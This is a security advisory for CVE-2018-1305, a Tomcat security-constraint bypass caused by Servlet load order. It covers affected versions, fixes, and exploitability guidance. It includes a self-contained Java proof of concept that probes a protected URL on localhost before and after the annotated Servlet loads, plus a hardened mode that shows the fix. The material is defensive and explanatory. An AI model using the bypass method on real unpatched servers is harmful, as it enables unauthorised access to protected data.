CVE-2018-1305
Security Bypass vulnerability in tomcat-embed-core (Maven)


What is CVE-2018-1305 About?

This vulnerability in Apache Tomcat versions 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 is a security bypass flaw. Security constraints declared by Servlet annotations (@ServletSecurity) were only applied once the annotated Servlet had been loaded. Because a constraint declared this way covers the Servlet's URL pattern and every URL below it, resources under that pattern could be reached by unauthorized users until the Servlet was loaded. Whether a given resource was exposed depended on the order in which Servlets were loaded.

Affected Software

  • org.apache.tomcat.embed:tomcat-embed-core
    • >=7.0.0, <7.0.85
    • >=8.5.0, <8.5.28
    • >=9.0.0.M1, <9.0.5

Technical Details

In the affected Apache Tomcat versions, the security constraints declared by a @ServletSecurity annotation were created only when the annotated Servlet was loaded, which for a Servlet without load-on-startup happens on the first request that maps to it. A constraint declared this way applies to the Servlet's URL patterns and every URL below them, not only to requests that the annotated Servlet itself handles. So a resource under that pattern that is served by something else (for example, a second Servlet with a more specific mapping) was unprotected until the annotated Servlet had been loaded, and became protected only afterwards. This is an ordering problem rather than a timing race: the window is open from application start or redeploy until the first request reaches the annotated Servlet, which may be indefinitely. Consequently, resources that should have been protected by the annotation-based constraints could be accessed by unauthorized users, bypassing the intended access control, and which resources were exposed depended entirely on the order in which Servlets were loaded and requests were processed.

What is the Impact of CVE-2018-1305?

Successful exploitation may allow attackers to bypass security constraints, leading to unauthorized access to sensitive resources and potentially information disclosure or data modification.

What is the Exploitability of CVE-2018-1305?

Exploitation involves identifying a URL that lies under an annotation-protected URL pattern but is served before the annotated Servlet has been loaded, and simply requesting it. No authentication and no privileges beyond the ability to send requests to the application are needed, and no precise timing is required: the window stays open from application start or redeploy until the first request reaches the annotated Servlet. The complexity is low once the application's Servlet mappings are understood, for example from a crawl of the application. This is a remote vulnerability. Deployments that declare their constraints in web.xml, or that load every annotated Servlet at startup so its constraints exist before the application serves requests, do not have this window.
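The following embedded-Tomcat program is an added example, not code from the original page or from the Apache Tomcat project. It builds the layout described in the Technical Details and Exploitability sections above: an annotated AdminServlet on /admin/* and an unannotated StatusServlet on the exact mapping /admin/status, then probes the status URL before and after the annotated Servlet is first loaded. The servlet names, the user alice with role admin, and the "sensitive" response body are all hypothetical; the program assumes the tomcat-embed-core 8.5.x/9.0.x API (javax.servlet, Context.addServletMappingDecoded, SecurityCollection.addPatternDecoded). Run with --hardened to register the same constraint programmatically at startup, which is the version-independent fix for this class of problem.

```java
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.file.Files;
import javax.servlet.annotation.HttpConstraint;
import javax.servlet.annotation.ServletSecurity;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.catalina.Context;
import org.apache.catalina.Wrapper;
import org.apache.catalina.authenticator.BasicAuthenticator;
import org.apache.catalina.startup.Tomcat;
import org.apache.tomcat.util.descriptor.web.LoginConfig;
import org.apache.tomcat.util.descriptor.web.SecurityCollection;
import org.apache.tomcat.util.descriptor.web.SecurityConstraint;

public class Cve20181305Demo {

    // Hypothetical annotated Servlet: its constraint covers /admin/* and everything below.
    @ServletSecurity(@HttpConstraint(rolesAllowed = "admin"))
    public static class AdminServlet extends HttpServlet {
        @Override
        protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
            resp.getWriter().println("admin console");
        }
    }

    // Hypothetical unannotated Servlet on an exact mapping under /admin/*.
    // On an affected version it is reachable until AdminServlet has been loaded.
    public static class StatusServlet extends HttpServlet {
        @Override
        protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
            resp.getWriter().println("db=jdbc:mysql://db/prod users=1337"); // constructed sample data
        }
    }

    // Unauthenticated GET; returns the HTTP status code (401 means the constraint was enforced).
    static int get(int port, String path) throws IOException {
        HttpURLConnection c = (HttpURLConnection) new URL("http://localhost:" + port + path).openConnection();
        int code = c.getResponseCode();
        c.disconnect();
        return code;
    }

    public static void main(String[] args) throws Exception {
        boolean hardened = args.length > 0 && args[0].equals("--hardened");

        Tomcat tomcat = new Tomcat();
        tomcat.setPort(0);              // ephemeral port; read the real one after start
        tomcat.getConnector();
        Context ctx = tomcat.addContext("", Files.createTempDirectory("cve-2018-1305").toString());

        // Servlets are added by class name so Tomcat instantiates them itself and
        // processes @ServletSecurity in the usual place (Servlet load).
        Wrapper admin = Tomcat.addServlet(ctx, "admin", AdminServlet.class.getName());
        ctx.addServletMappingDecoded("/admin/*", "admin");
        Tomcat.addServlet(ctx, "status", StatusServlet.class.getName());
        ctx.addServletMappingDecoded("/admin/status", "status");

        // BASIC auth against the embedded in-memory realm (hypothetical user/role).
        tomcat.addUser("alice", "secret");
        tomcat.addRole("alice", "admin");
        ctx.addSecurityRole("admin");
        ctx.setLoginConfig(new LoginConfig("BASIC", "admin", null, null));
        ctx.getPipeline().addValve(new BasicAuthenticator());

        if (hardened) {
            // Declare the constraint explicitly (equivalent to a web.xml <security-constraint>)
            // so it exists from context start regardless of Servlet load order, and load the
            // annotated Servlet at startup as defence in depth.
            SecurityCollection coll = new SecurityCollection();
            coll.addPatternDecoded("/admin/*");
            SecurityConstraint sc = new SecurityConstraint();
            sc.addCollection(coll);
            sc.addAuthRole("admin");
            ctx.addConstraint(sc);
            admin.setLoadOnStartup(1);
        }

        tomcat.start();
        int port = tomcat.getConnector().getLocalPort();
        System.out.println("GET /admin/status before AdminServlet is loaded: " + get(port, "/admin/status"));
        System.out.println("GET /admin/ (loads AdminServlet):               " + get(port, "/admin/"));
        System.out.println("GET /admin/status after AdminServlet is loaded:  " + get(port, "/admin/status"));
        tomcat.stop();
        tomcat.destroy();
    }
}
```

Compile and run with tomcat-embed-core (and its tomcat-annotations-api dependency) on the classpath. On an affected version without --hardened, the first probe returns 200 with the constructed "sensitive" body and only the third returns 401, because the /admin/* constraint is created when the second request loads AdminServlet. With --hardened, or on a fixed version (7.0.85, 8.5.28, 9.0.5 or later), all three probes return 401. The programmatic SecurityConstraint is the same thing a web.xml <security-constraint> produces, which is why declaring constraints in the descriptor is the robust option when an application must run on a version you cannot upgrade.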

What are the Known Public Exploits?

PoC Author   Link   Commentary
Pa55w0rd     Link   Apache Tomcat security bypass vulnerability PoC

What are the Available Fixes for CVE-2018-1305?

A Fix by Resolved Security Exists!
See how we help you strengthen security with automated backported fixes for your libraries.

About the Fix from Resolved Security

This patch fixes CVE-2018-1305 by ensuring that all @ServletSecurity annotations are processed at web application startup instead of during servlet load or upon first request, so that security constraints are correctly and predictably enforced. Previously, constraints from annotations could be missed for servlets created or loaded dynamically, potentially allowing unauthorized access; this patch resolves that by applying constraints consistently for all servlets before the application receives requests.

Available Upgrade Options

  • org.apache.tomcat.embed:tomcat-embed-core
    • >=7.0.0, <7.0.85 → Upgrade to 7.0.85
    • >=8.5.0, <8.5.28 → Upgrade to 8.5.28
    • >=9.0.0.M1, <9.0.5 → Upgrade to 9.0.5


Additional Resources

What are Similar Vulnerabilities to CVE-2018-1305?

Similar Vulnerabilities: CVE-2014-0075, CVE-2015-5174, CVE-2016-6816, CVE-2017-5647, CVE-2019-0232